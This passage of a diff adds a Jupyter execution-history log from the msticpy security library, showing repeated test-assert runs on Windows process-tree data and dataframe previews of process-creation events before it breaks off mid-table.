+       "evalue": "",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mAssertionError\u001b[0m                            Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-18-764d8a44465b>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[0;32m      4\u001b[0m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mfull_tree\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m871\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      5\u001b[0m \u001b[0mchildren\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 6\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mchildren\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m13\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m      7\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      8\u001b[0m \u001b[0mdepth\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mfull_tree\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;34m\"path\"\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mstr\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mcount\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m\"/\"\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mmax\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m+\u001b[0m \u001b[1;36m1\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;31mAssertionError\u001b[0m: "
+       ]
+      }
+     ],
+     "persistentId": "f3fdc570-35d1-49cd-bfbf-c3a305566e20",
+     "text": "\nassert len(ptutil.get_roots(p_tree_l)) == 29\nt_root = ptutil.get_roots(p_tree_l).iloc[0]\nfull_tree = ptutil.get_descendents(p_tree_l, t_root)\nassert len(full_tree) == 871\nchildren = ptutil.get_children(p_tree_l, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree_l, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree_l, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree_l, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree_l, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree_l, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree_l, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=True))\nassert len(children2) == (len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=False)) + 1)\nassert ptutil.get_summary_info(p_tree_l) == {\n    'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree_l) == ptutil.WIN_EVENT_SCH"
+    },
+    "executionTime": "2019-12-13T21:39:25.643Z"
+   },
+   {
+    "cell": {
+     "executionCount": 20,
+     "executionEventId": "a445df77-1549-4f42-9748-6de13cf6446d",
+     "hasError": true,
+     "id": "77f00558-8d9a-44ba-b022-4d48ccbac5f2",
+     "outputs": [
+      {
+       "ename": "AssertionError",
+       "evalue": "",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mAssertionError\u001b[0m                            Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-20-516132413635>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[0;32m     27\u001b[0m  \u001b[1;34m'BranchProcesses'\u001b[0m\u001b[1;33m:\u001b[0m \u001b[1;36m185\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m     28\u001b[0m  \u001b[1;34m'IsolatedProcesses'\u001b[0m\u001b[1;33m:\u001b[0m \u001b[1;36m0\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m---> 29\u001b[1;33m  'LargestTreeDepth': 7}\n\u001b[0m\u001b[0;32m     30\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m     31\u001b[0m \u001b[1;32massert\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0minfer_schema\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mWIN_EVENT_SCH\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;31mAssertionError\u001b[0m: "
+       ]
+      }
+     ],
+     "persistentId": "f3fdc570-35d1-49cd-bfbf-c3a305566e20",
+     "text": "\nassert len(ptutil.get_roots(p_tree_l)) == 29\nt_root = ptutil.get_roots(p_tree_l).iloc[0]\nfull_tree = ptutil.get_descendents(p_tree_l, t_root)\nassert len(full_tree) == 871\nchildren = ptutil.get_children(p_tree_l, t_root)\nassert len(children) == 436\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree_l, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree_l, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree_l, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree_l, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree_l, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree_l, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=True))\nassert len(children2) == (len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=False)) + 1)\nassert ptutil.get_summary_info(p_tree_l) == {\n    'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree_l) == ptutil.WIN_EVENT_SCH"
+    },
+    "executionTime": "2019-12-13T21:39:52.520Z"
+   },
+   {
+    "cell": {
+     "executionCount": 21,
+     "executionEventId": "6c69f0b6-c81b-4551-a298-8e4a9f255d30",
+     "hasError": true,
+     "id": "77f00558-8d9a-44ba-b022-4d48ccbac5f2",
+     "outputs": [
+      {
+       "ename": "AssertionError",
+       "evalue": "",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mAssertionError\u001b[0m                            Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-21-710a95311896>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[0;32m     23\u001b[0m \u001b[1;32massert\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_summary_info\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;33m{\u001b[0m\u001b[1;34m'Processes'\u001b[0m\u001b[1;33m:\u001b[0m \u001b[1;36m1029\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;34m'RootProcesses'\u001b[0m\u001b[1;33m:\u001b[0m \u001b[1;36m29\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;34m'LeafProcesses'\u001b[0m\u001b[1;33m:\u001b[0m \u001b[1;36m497\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;34m'BranchProcesses'\u001b[0m\u001b[1;33m:\u001b[0m \u001b[1;36m503\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;34m'IsolatedProcesses'\u001b[0m\u001b[1;33m:\u001b[0m \u001b[1;36m0\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;34m'LargestTreeDepth'\u001b[0m\u001b[1;33m:\u001b[0m \u001b[1;36m5\u001b[0m\u001b[1;33m}\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m     24\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m---> 25\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0minfer_schema\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mWIN_EVENT_SCH\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m",
+        "\u001b[1;31mAssertionError\u001b[0m: "
+       ]
+      }
+     ],
+     "persistentId": "f3fdc570-35d1-49cd-bfbf-c3a305566e20",
+     "text": "\nassert len(ptutil.get_roots(p_tree_l)) == 29\nt_root = ptutil.get_roots(p_tree_l).iloc[0]\nfull_tree = ptutil.get_descendents(p_tree_l, t_root)\nassert len(full_tree) == 871\nchildren = ptutil.get_children(p_tree_l, t_root)\nassert len(children) == 436\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree_l, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree_l, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree_l, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree_l, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree_l, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree_l, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=True))\nassert len(children2) == (len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=False)) + 1)\nassert ptutil.get_summary_info(p_tree_l) == {'Processes': 1029, 'RootProcesses': 29, 'LeafProcesses': 497, 'BranchProcesses': 503, 'IsolatedProcesses': 0, 'LargestTreeDepth': 5}\n\nassert ptutil.infer_schema(p_tree_l) == ptutil.WIN_EVENT_SCH"
+    },
+    "executionTime": "2019-12-13T21:40:31.946Z"
+   },
+   {
+    "cell": {
+     "executionCount": 22,
+     "executionEventId": "1225686a-d9e4-4cb9-937a-997a536f77f6",
+     "hasError": false,
+     "id": "77f00558-8d9a-44ba-b022-4d48ccbac5f2",
+     "outputs": [],
+     "persistentId": "f3fdc570-35d1-49cd-bfbf-c3a305566e20",
+     "text": "\nassert len(ptutil.get_roots(p_tree_l)) == 29\nt_root = ptutil.get_roots(p_tree_l).iloc[0]\nfull_tree = ptutil.get_descendents(p_tree_l, t_root)\nassert len(full_tree) == 871\nchildren = ptutil.get_children(p_tree_l, t_root)\nassert len(children) == 436\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree_l, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree_l, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree_l, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree_l, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree_l, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree_l, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=True))\nassert len(children2) == (len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=False)) + 1)\nassert ptutil.get_summary_info(p_tree_l) == {'Processes': 1029, 'RootProcesses': 29, 'LeafProcesses': 497, 'BranchProcesses': 503, 'IsolatedProcesses': 0, 'LargestTreeDepth': 5}\n\nassert ptutil.infer_schema(p_tree_l) == ptutil.LX_EVENT_SCH"
+    },
+    "executionTime": "2019-12-13T21:40:41.468Z"
+   },
+   {
+    "cell": {
+     "executionCount": 1,
+     "executionEventId": "8ae1cbce-55d9-422e-a1ab-96220b3bdbb1",
+     "hasError": true,
+     "id": "6be14541-0e7c-4bb9-ae1f-69c923cc1543",
+     "outputs": [
+      {
+       "ename": "NameError",
+       "evalue": "name 'pd' is not defined",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mNameError\u001b[0m                                 Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-1-a3c135eafb7c>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mproc_rarity\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mpd\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mread_pickle\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m\"../demos/data/process_rarity.pkl\"\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m",
+        "\u001b[1;31mNameError\u001b[0m: name 'pd' is not defined"
+       ]
+      }
+     ],
+     "persistentId": "35246f6b-b15f-4eb4-941e-f53824a56ead",
+     "text": "proc_rarity = pd.read_pickle(\"../demos/data/process_rarity.pkl\")"
+    },
+    "executionTime": "2019-12-13T22:38:23.697Z"
+   },
+   {
+    "cell": {
+     "executionCount": 2,
+     "executionEventId": "6b8e33f3-ae06-4d75-bdf7-6942185c794c",
+     "hasError": false,
+     "id": "6be14541-0e7c-4bb9-ae1f-69c923cc1543",
+     "outputs": [],
+     "persistentId": "35246f6b-b15f-4eb4-941e-f53824a56ead",
+     "text": "import pandas as pd\nproc_rarity = pd.read_pickle(\"../demos/data/process_rarity.pkl\")"
+    },
+    "executionTime": "2019-12-13T22:38:51.996Z"
+   },
+   {
+    "cell": {
+     "executionCount": 3,
+     "executionEventId": "c09016ff-5f87-4500-8d25-353993f3c407",
+     "hasError": false,
+     "id": "6be14541-0e7c-4bb9-ae1f-69c923cc1543",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "\nThis product includes GeoLite2 data created by MaxMind, available from\n<a href=\"https://www.maxmind.com\">https://www.maxmind.com</a>.\n",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "text/html": "\nThis library uses services provided by ipstack.\n<a href=\"https://ipstack.com\">https://ipstack.com</a>",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "name": "stdout",
+       "output_type": "stream",
+       "text": "Using Open PageRank. See https://www.domcop.com/openpagerank/what-is-openpagerank\n"
+      }
+     ],
+     "persistentId": "35246f6b-b15f-4eb4-941e-f53824a56ead",
+     "text": "import pandas as pd\nproc_rarity = pd.read_pickle(\"../demos/data/process_rarity.pkl\")\n\nproc_tree = pd.read_pickle(\"../bhdemo/process_tree\")\n\nfrom msticpy.sectools import *\nimport msticpy.nbtools.process_tree as ptplot"
+    },
+    "executionTime": "2019-12-13T22:42:45.614Z"
+   },
+   {
+    "cell": {
+     "executionCount": 4,
+     "executionEventId": "b0f79a28-4282-44af-82b8-3d064fd786a7",
+     "hasError": true,
+     "id": "ca79e527-dd67-49ee-a623-46e05389e884",
+     "outputs": [
+      {
+       "ename": "NameError",
+       "evalue": "name 'ptutil' is not defined",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mNameError\u001b[0m                                 Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-4-d0579ea7745f>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mptutil\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m",
+        "\u001b[1;31mNameError\u001b[0m: name 'ptutil' is not defined"
+       ]
+      }
+     ],
+     "persistentId": "1918edbe-6e6a-4d00-9c31-de7fed6f588b",
+     "text": "ptutil"
+    },
+    "executionTime": "2019-12-13T22:43:05.613Z"
+   },
+   {
+    "cell": {
+     "executionCount": 5,
+     "executionEventId": "0d05f0df-57c6-4c57-8082-08b3347cc17b",
+     "hasError": false,
+     "id": "ca79e527-dd67-49ee-a623-46e05389e884",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "<function dir>"
+       },
+       "execution_count": 5,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "1918edbe-6e6a-4d00-9c31-de7fed6f588b",
+     "text": "dir"
+    },
+    "executionTime": "2019-12-13T22:43:10.309Z"
+   },
+   {
+    "cell": {
+     "executionCount": 6,
+     "executionEventId": "aac94171-6622-4a1a-a198-1a1f8044ef56",
+     "hasError": false,
+     "id": "ca79e527-dd67-49ee-a623-46e05389e884",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "['GeoLiteLookup',\n 'IPStackLookup',\n 'In',\n 'IoCExtract',\n 'Out',\n 'TILookup',\n 'VERSION',\n 'VTLookup',\n '_',\n '_5',\n '__',\n '___',\n '__builtin__',\n '__builtins__',\n '__doc__',\n '__loader__',\n '__name__',\n '__package__',\n '__spec__',\n '_dh',\n '_i',\n '_i1',\n '_i2',\n '_i3',\n '_i4',\n '_i5',\n '_i6',\n '_ih',\n '_ii',\n '_iii',\n '_oh',\n 'base64',\n 'base64unpack',\n 'domain_utils',\n 'exit',\n 'geo_distance',\n 'geoip',\n 'get_ipython',\n 'iocextract',\n 'pd',\n 'proc_rarity',\n 'proc_tree',\n 'process_tree_utils',\n 'ptplot',\n 'ptree',\n 'quit',\n 'tilookup',\n 'tiproviders',\n 'vtlookup']"
+       },
+       "execution_count": 6,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "1918edbe-6e6a-4d00-9c31-de7fed6f588b",
+     "text": "dir()"
+    },
+    "executionTime": "2019-12-13T22:43:12.939Z"
+   },
+   {
+    "cell": {
+     "executionCount": 7,
+     "executionEventId": "4810f606-3705-4e0e-91f1-2accf522c793",
+     "hasError": true,
+     "id": "cb9f54c7-e7fb-4ec4-a3a9-985bc77d2efa",
+     "outputs": [
+      {
+       "ename": "NameError",
+       "evalue": "name 'process_rarity' is not defined",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mNameError\u001b[0m                                 Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-7-84b76305b683>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mprocess_rarity\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mhead\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m",
+        "\u001b[1;31mNameError\u001b[0m: name 'process_rarity' is not defined"
+       ]
+      }
+     ],
+     "persistentId": "e27a3066-b20e-483c-b9c2-52c154f1a03c",
+     "text": "process_rarity.head()"
+    },
+    "executionTime": "2019-12-13T22:44:50.171Z"
+   },
+   {
+    "cell": {
+     "executionCount": 8,
+     "executionEventId": "59388e10-0a72-4a89-b227-74cfc2b5faa3",
+     "hasError": false,
+     "id": "cb9f54c7-e7fb-4ec4-a3a9-985bc77d2efa",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "<div>\n<style scoped>\n    .dataframe tbody tr th:only-of-type {\n        vertical-align: middle;\n    }\n\n    .dataframe tbody tr th {\n        vertical-align: top;\n    }\n\n    .dataframe thead th {\n        text-align: right;\n    }\n</style>\n<table border=\"1\" class=\"dataframe\">\n  <thead>\n    <tr style=\"text-align: right;\">\n      <th></th>\n      <th>SubjectUserName</th>\n      <th>SubjectLogonId</th>\n      <th>Rarity</th>\n      <th>ProcessCount</th>\n    </tr>\n  </thead>\n  <tbody>\n    <tr>\n      <th>0</th>\n      <td>-</td>\n      <td>0x3e7</td>\n      <td>0.350000</td>\n      <td>20</td>\n    </tr>\n    <tr>\n      <th>1</th>\n      <td>LOCAL SERVICE</td>\n      <td>0x3e5</td>\n      <td>0.038462</td>\n      <td>26</td>\n    </tr>\n    <tr>\n      <th>2</th>\n      <td>MSTICAdmin</td>\n      <td>0x109c408</td>\n      <td>0.432549</td>\n      <td>10</td>\n    </tr>\n    <tr>\n      <th>3</th>\n      <td>MSTICAdmin</td>\n      <td>0x1e821b5</td>\n      <td>0.239992</td>\n      <td>8</td>\n    </tr>\n    <tr>\n      <th>4</th>\n      <td>MSTICAdmin</td>\n      <td>0x1f388a3</td>\n      <td>0.202848</td>\n      <td>7</td>\n    </tr>\n  </tbody>\n</table>\n</div>",
+        "text/plain": "  SubjectUserName SubjectLogonId    Rarity  ProcessCount\n0               -          0x3e7  0.350000            20\n1   LOCAL SERVICE          0x3e5  0.038462            26\n2      MSTICAdmin      0x109c408  0.432549            10\n3      MSTICAdmin      0x1e821b5  0.239992             8\n4      MSTICAdmin      0x1f388a3  0.202848             7"
+       },
+       "execution_count": 8,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "e27a3066-b20e-483c-b9c2-52c154f1a03c",
+     "text": "proc_rarity.head()"
+    },
+    "executionTime": "2019-12-13T22:45:04.278Z"
+   },
+   {
+    "cell": {
+     "executionCount": 9,
+     "executionEventId": "beb581ff-ad68-4a29-839c-75c4b2e23d07",
+     "hasError": false,
+     "id": "6be14541-0e7c-4bb9-ae1f-69c923cc1543",
+     "outputs": [],
+     "persistentId": "35246f6b-b15f-4eb4-941e-f53824a56ead",
+     "text": "import pandas as pd\nproc_rarity = pd.read_pickle(\"../demos/data/procs_with_cluster.pkl\")\n\nproc_tree = pd.read_pickle(\"../bhdemo/process_tree\")\n\nfrom msticpy.sectools import *\nimport msticpy.nbtools.process_tree as ptplot"
+    },
+    "executionTime": "2019-12-13T22:45:52.409Z"
+   },
+   {
+    "cell": {
+     "executionCount": 10,
+     "executionEventId": "0a375198-c37a-4e9b-a288-b6bfd8fec5d3",
+     "hasError": false,
+     "id": "cb9f54c7-e7fb-4ec4-a3a9-985bc77d2efa",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "<div>\n<style scoped>\n    .dataframe tbody tr th:only-of-type {\n        vertical-align: middle;\n    }\n\n    .dataframe tbody tr th {\n        vertical-align: top;\n    }\n\n    .dataframe thead th {\n        text-align: right;\n    }\n</style>\n<table border=\"1\" class=\"dataframe\">\n  <thead>\n    <tr style=\"text-align: right;\">\n      <th></th>\n      <th>TenantId</th>\n      <th>Account</th>\n      <th>EventID</th>\n      <th>TimeGenerated</th>\n      <th>Computer</th>\n      <th>SubjectUserSid</th>\n      <th>SubjectUserName</th>\n      <th>SubjectDomainName</th>\n      <th>SubjectLogonId</th>\n      <th>NewProcessId</th>\n      <th>...</th>\n      <th>pathHash</th>\n      <th>commandlineLen</th>\n      <th>commandlineLogLen</th>\n      <th>commandlineTokensFull</th>\n      <th>commandlineScore</th>\n      <th>commandlineTokensHash</th>\n      <th>isSystemSession</th>\n      <th>accountNum</th>\n      <th>ClusterSize</th>\n      <th>Rarity</th>\n    </tr>\n  </thead>\n  <tbody>\n    <tr>\n      <th>0</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 15:21:06.890</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xd78</td>\n      <td>...</td>\n      <td>4163782718</td>\n      <td>119</td>\n      <td>2.075547</td>\n      <td>18</td>\n      <td>10142</td>\n      <td>2764818190</td>\n      <td>True</td>\n      <td>2202</td>\n      <td>129</td>\n      <td>0.007752</td>\n    </tr>\n    <tr>\n      <th>1</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 13:12:52.733</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x6f8</td>\n      <td>...</td>\n      <td>4163782718</td>\n      <td>119</td>\n      <td>2.075547</td>\n      <td>18</td>\n      <td>10142</td>\n      <td>2764818190</td>\n      <td>True</td>\n      <td>2202</td>\n      <td>129</td>\n      <td>0.007752</td>\n    </tr>\n    <tr>\n      <th>2</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 12:08:46.173</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xd68</td>\n      <td>...</td>\n      <td>4163782718</td>\n      <td>119</td>\n      <td>2.075547</td>\n      <td>18</td>\n      <td>10142</td>\n      <td>2764818190</td>\n      <td>True</td>\n      <td>2202</td>\n      <td>129</td>\n      <td>0.007752</td>\n    </tr>\n    <tr>\n      <th>3</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 14:16:59.427</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x16d4</td>\n      <td>...</td>\n      <td>4163782718</td>\n      <td>119</td>\n      <td>2.075547</td>\n      <td>18</td>\n      <td>10142</td>\n      <td>2764818190</td>\n      <td>True</td>\n      <td>2202</td>\n      <td>129</td>\n      <td>0.007752</td>\n    </tr>\n    <tr>\n      <th>4</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 08:56:16.593</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x1070</td>\n      <td>...</td>\n      <td>4163782718</td>\n      <td>119</td>\n      <td>2.075547</td>\n      <td>18</td>\n      <td>10142</td>\n      <td>2764818190</td>\n      <td>True</td>\n      <td>2202</td>\n      <td>129</td>\n      <td>0.007752</td>\n    </tr>\n  </tbody>\n</table>\n<p>5 rows × 31 columns</p>\n</div>",
+        "text/plain": "                               TenantId                     Account  EventID  \\\n0  52b1ab41-869e-4138-9e40-2a4457f09bf0  WORKGROUP\\MSTICAlertsWin1$     4688   \n1  52b1ab41-869e-4138-9e40-2a4457f09bf0  WORKGROUP\\MSTICAlertsWin1$     4688   \n2  52b1ab41-869e-4138-9e40-2a4457f09bf0  WORKGROUP\\MSTICAlertsWin1$     4688   \n3  52b1ab41-869e-4138-9e40-2a4457f09bf0  WORKGROUP\\MSTICAlertsWin1$     4688   \n4  52b1ab41-869e-4138-9e40-2a4457f09bf0  WORKGROUP\\MSTICAlertsWin1$     4688   \n\n            TimeGenerated         Computer SubjectUserSid   SubjectUserName  \\\n0 2019-02-10 15:21:06.890  MSTICAlertsWin1       S-1-5-18  MSTICAlertsWin1$   \n1 2019-02-10 13:12:52.733  MSTICAlertsWin1       S-1-5-18  MSTICAlertsWin1$   \n2 2019-02-10 12:08:46.173  MSTICAlertsWin1       S-1-5-18  MSTICAlertsWin1$   \n3 2019-02-10 